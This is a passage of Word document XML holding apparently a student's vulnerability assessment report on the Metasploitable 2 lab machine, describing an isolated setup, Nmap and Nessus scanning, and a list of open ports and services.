          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2646" w:rsidRPr="006F2646" w:rsidRDefault="006F2646" w:rsidP="006F2646">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Focus on high and critical severity vulnerabilities first, as they pose the most significant risks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F2646" w:rsidRPr="00E83055" w:rsidRDefault="006F2646" w:rsidP="00E83055">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:between w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:bar w:val="single" w:sz="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a vulnerability assessment of Metasploitable 2 using Nessus, you can identify vulnerabilities in the target system. The scan results will provide details such as the specific vulnerabilities, their severity levels (e.g., high, medium, low), and potential impacts on the security of the system. It is crucial to prioritize and address high and critical severity vulnerabilities first, as they can potentially lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>unauthorized access, data breaches, or other security compromises.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="00E83055" w:rsidRDefault="006F2646" w:rsidP="00E83055">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rial Black" w:hAnsi="Arial Black" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>4.C</w:t>
      </w:r>
      <w:r w:rsidR="00CE2F63" w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>omprehensive Vulnerability Assessment Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="00CE2F63" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="006F2646" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1. Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE2F63">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The objective of this project was to conduct a comprehensive vulnerability assessment of the Metasploitable 2 system using Nmap and Nessus. The methodology involved a systematic approach to identify open ports, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE2F63">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>services, and potential vulnerabilities. Nmap was utilized for initial reconnaissance, and Nessus was used for in-depth vulnerability scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a) Installation Process:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploitable 2 was installed on a virtual machine using the provided ISO image. The installation involved configuring network settings, such as IP address and gateway, to enable communication with the host machine and network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b) Network Configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> The virtual machine was set up with a bridged network configuration, allowing it to obtain an IP address from the local network and interact with other devices. This configuration facilitated scanning and vulnerability assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c) Scanning with Nmap:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nmap, a network scanning tool, was used to perform a comprehensive scan of the Metasploitable 2 machine. The scan aimed to identify open ports, running services, and potential vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00CE2F63" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>d) Nessus Vulnerability Assessment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nessus, a powerful vulnerability scanning tool, was utilized to conduct a thorough assessment of the Metasploitable 2 system. It scanned for known vulnerabilities and provided severity ratings for each identified issue.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="006F2646" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="006F2646" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. Metasploitable 2 Installation and Network Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="00CE2F63" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE2F63">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable 2 was installed on a separate isolated network segment to ensure proper containment. The installation process involved deploying the virtual machine image and configuring network settings accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="00CE2F63" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRPr="006F2646" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3. Nmap Scan Results:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE2F63" w:rsidRDefault="00CE2F63" w:rsidP="00CE2F63">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE2F63">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The Nmap scan revealed several open ports and services running on Metasploitable 2. Notable findings include open ports for SSH, FTP, Telnet, and vulnerable versions of Apache, Samba, and MySQL. These services may pose potential risks if not properly secured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The open ports and their associated services are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 21: FTP (File Transfer Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 22: SSH (Secure Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 23: Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 25: SMTP (Simple Mail Transfer Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Port 53: DNS (Domain Name System)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 69: TFTP (Trivial File Transfer Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 80: HTTP (Hypertext Transfer Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 110: POP3 (Post Office Protocol 3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 139: NetBIOS Session Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 445: SMB (Server Message Block)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 512: Rexec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 513: Rlogin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 514: Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E44C72" w:rsidRPr="00E44C72" w:rsidRDefault="00E44C72" w:rsidP="00E44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44C72">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Port 1099: RMI Registry</w:t>
      </w:r>
    </w:p>
